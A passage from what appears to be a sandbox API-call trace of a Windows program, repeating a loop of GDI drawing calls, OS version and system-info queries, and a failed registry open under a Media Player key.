StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.542] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.542] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.542] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.542] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.542] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.542] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.542] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x28040713 [0017.542] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1e04027d [0017.542] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a30 [0017.542] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a31 [0017.542] CombineRgn (hrgnDst=0x1040a30, hrgnSrc1=0x28040713, hrgnSrc2=0x1e04027d, iMode=1) returned 1 [0017.542] CombineRgn (hrgnDst=0x1040a31, hrgnSrc1=0x28040713, hrgnSrc2=0x1e04027d, iMode=4) returned 2 [0017.542] CreateSolidBrush (color=0xff) returned 0x2100a2f [0017.542] CreateSolidBrush (color=0xff0000) returned 0x1100a32 [0017.542] DeleteObject (ho=0x1100a32) returned 1 [0017.542] DeleteObject (ho=0x1e04027d) returned 1 [0017.542] DeleteObject (ho=0x28040713) returned 1 [0017.542] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.542] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.543] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.543] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.543] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.543] BeginPath (hdc=0x0) returned 0 [0017.543] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.543] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.543] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.543] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.543] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.543] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.543] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.543] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.543] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1f04027d [0017.543] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x29040713 [0017.543] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a33 [0017.543] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a34 [0017.543] CombineRgn (hrgnDst=0x1040a33, hrgnSrc1=0x1f04027d, hrgnSrc2=0x29040713, iMode=1) returned 1 [0017.543] CombineRgn (hrgnDst=0x1040a34, hrgnSrc1=0x1f04027d, hrgnSrc2=0x29040713, iMode=4) returned 2 [0017.543] CreateSolidBrush (color=0xff) returned 0x2100a32 [0017.543] CreateSolidBrush (color=0xff0000) returned 0x1100a35 [0017.543] DeleteObject (ho=0x1100a35) returned 1 [0017.543] DeleteObject (ho=0x29040713) returned 1 [0017.543] DeleteObject (ho=0x1f04027d) returned 1 [0017.543] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.543] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.543] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.543] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.543] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.543] BeginPath (hdc=0x0) returned 0 [0017.544] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.544] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.544] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.544] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.544] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.544] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.544] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.544] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.544] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2a040713 [0017.544] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2004027d [0017.544] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a36 [0017.544] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a37 [0017.544] CombineRgn (hrgnDst=0x1040a36, hrgnSrc1=0x2a040713, hrgnSrc2=0x2004027d, iMode=1) returned 1 [0017.544] CombineRgn (hrgnDst=0x1040a37, hrgnSrc1=0x2a040713, hrgnSrc2=0x2004027d, iMode=4) returned 2 [0017.544] CreateSolidBrush (color=0xff) returned 0x2100a35 [0017.544] CreateSolidBrush (color=0xff0000) returned 0x1100a38 [0017.544] DeleteObject (ho=0x1100a38) returned 1 [0017.544] DeleteObject (ho=0x2004027d) returned 1 [0017.544] DeleteObject (ho=0x2a040713) returned 1 [0017.544] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.544] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.544] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.544] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.544] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.544] BeginPath (hdc=0x0) returned 0 [0017.544] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.544] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.545] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.545] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.545] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.545] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.545] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.545] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.545] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2104027d [0017.545] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2b040713 [0017.545] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a39 [0017.545] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a3a [0017.545] CombineRgn (hrgnDst=0x1040a39, hrgnSrc1=0x2104027d, hrgnSrc2=0x2b040713, iMode=1) returned 1 [0017.545] CombineRgn (hrgnDst=0x1040a3a, hrgnSrc1=0x2104027d, hrgnSrc2=0x2b040713, iMode=4) returned 2 [0017.545] CreateSolidBrush (color=0xff) returned 0x2100a38 [0017.545] CreateSolidBrush (color=0xff0000) returned 0x1100a3b [0017.545] DeleteObject (ho=0x1100a3b) returned 1 [0017.545] DeleteObject (ho=0x2b040713) returned 1 [0017.545] DeleteObject (ho=0x2104027d) returned 1 [0017.545] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.545] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.545] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.545] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.545] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.545] BeginPath (hdc=0x0) returned 0 [0017.545] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.545] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.545] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.545] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.545] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.545] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.546] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.546] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.546] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2c040713 [0017.546] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2204027d [0017.546] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a3c [0017.546] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a3d [0017.546] CombineRgn (hrgnDst=0x1040a3c, hrgnSrc1=0x2c040713, hrgnSrc2=0x2204027d, iMode=1) returned 1 [0017.546] CombineRgn (hrgnDst=0x1040a3d, hrgnSrc1=0x2c040713, hrgnSrc2=0x2204027d, iMode=4) returned 2 [0017.546] CreateSolidBrush (color=0xff) returned 0x2100a3b [0017.546] CreateSolidBrush (color=0xff0000) returned 0x1100a3e [0017.546] DeleteObject (ho=0x1100a3e) returned 1 [0017.546] DeleteObject (ho=0x2204027d) returned 1 [0017.546] DeleteObject (ho=0x2c040713) returned 1 [0017.546] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.546] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.546] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.546] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.546] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.546] BeginPath (hdc=0x0) returned 0 [0017.546] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.546] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.546] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.546] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.546] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.547] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.547] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.547] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.547] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2304027d [0017.547] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2d040713 [0017.547] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a3f [0017.547] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a40 [0017.547] CombineRgn (hrgnDst=0x1040a3f, hrgnSrc1=0x2304027d, hrgnSrc2=0x2d040713, iMode=1) returned 1 [0017.547] CombineRgn (hrgnDst=0x1040a40, hrgnSrc1=0x2304027d, hrgnSrc2=0x2d040713, iMode=4) returned 2 [0017.547] CreateSolidBrush (color=0xff) returned 0x2100a3e [0017.547] CreateSolidBrush (color=0xff0000) returned 0x1100a41 [0017.547] DeleteObject (ho=0x1100a41) returned 1 [0017.547] DeleteObject (ho=0x2d040713) returned 1 [0017.547] DeleteObject (ho=0x2304027d) returned 1 [0017.547] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.547] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.547] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.547] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.547] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.547] BeginPath (hdc=0x0) returned 0 [0017.547] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.547] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.547] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.547] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.547] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.547] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.547] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.547] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.548] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2e040713 [0017.548] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2404027d [0017.548] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a42 [0017.548] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a43 [0017.548] CombineRgn (hrgnDst=0x1040a42, hrgnSrc1=0x2e040713, hrgnSrc2=0x2404027d, iMode=1) returned 1 [0017.548] CombineRgn (hrgnDst=0x1040a43, hrgnSrc1=0x2e040713, hrgnSrc2=0x2404027d, iMode=4) returned 2 [0017.548] CreateSolidBrush (color=0xff) returned 0x2100a41 [0017.548] CreateSolidBrush (color=0xff0000) returned 0x1100a44 [0017.548] DeleteObject (ho=0x1100a44) returned 1 [0017.548] DeleteObject (ho=0x2404027d) returned 1 [0017.548] DeleteObject (ho=0x2e040713) returned 1 [0017.548] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.548] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.548] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.548] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.548] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.548] BeginPath (hdc=0x0) returned 0 [0017.548] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.548] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.548] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.548] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.548] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.548] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.548] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.548] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.549] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2504027d [0017.549] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2f040713 [0017.549] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a45 [0017.549] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a46 [0017.549] CombineRgn (hrgnDst=0x1040a45, hrgnSrc1=0x2504027d, hrgnSrc2=0x2f040713, iMode=1) returned 1 [0017.549] CombineRgn (hrgnDst=0x1040a46, hrgnSrc1=0x2504027d, hrgnSrc2=0x2f040713, iMode=4) returned 2 [0017.549] CreateSolidBrush (color=0xff) returned 0x2100a44 [0017.549] CreateSolidBrush (color=0xff0000) returned 0x1100a47 [0017.549] DeleteObject (ho=0x1100a47) returned 1 [0017.549] DeleteObject (ho=0x2f040713) returned 1 [0017.549] DeleteObject (ho=0x2504027d) returned 1 [0017.549] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.549] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.549] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.549] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.549] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.549] BeginPath (hdc=0x0) returned 0 [0017.549] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.549] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.549] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.549] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.549] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.549] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.549] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.549] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.549] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x30040713 [0017.549] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2604027d [0017.549] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a48 [0017.549] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a49 [0017.550] CombineRgn (hrgnDst=0x1040a48, hrgnSrc1=0x30040713, hrgnSrc2=0x2604027d, iMode=1) returned 1 [0017.550] CombineRgn (hrgnDst=0x1040a49, hrgnSrc1=0x30040713, hrgnSrc2=0x2604027d, iMode=4) returned 2 [0017.550] CreateSolidBrush (color=0xff) returned 0x2100a47 [0017.550] CreateSolidBrush (color=0xff0000) returned 0x1100a4a [0017.550] DeleteObject (ho=0x1100a4a) returned 1 [0017.550] DeleteObject (ho=0x2604027d) returned 1 [0017.550] DeleteObject (ho=0x30040713) returned 1 [0017.550] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.550] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.550] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.550] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.550] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.550] BeginPath (hdc=0x0) returned 0 [0017.550] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.550] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.550] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.550] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.550] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.550] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.550] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.550] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.550] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2704027d [0017.550] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x31040713 [0017.550] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a4b [0017.550] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a4c [0017.550] CombineRgn 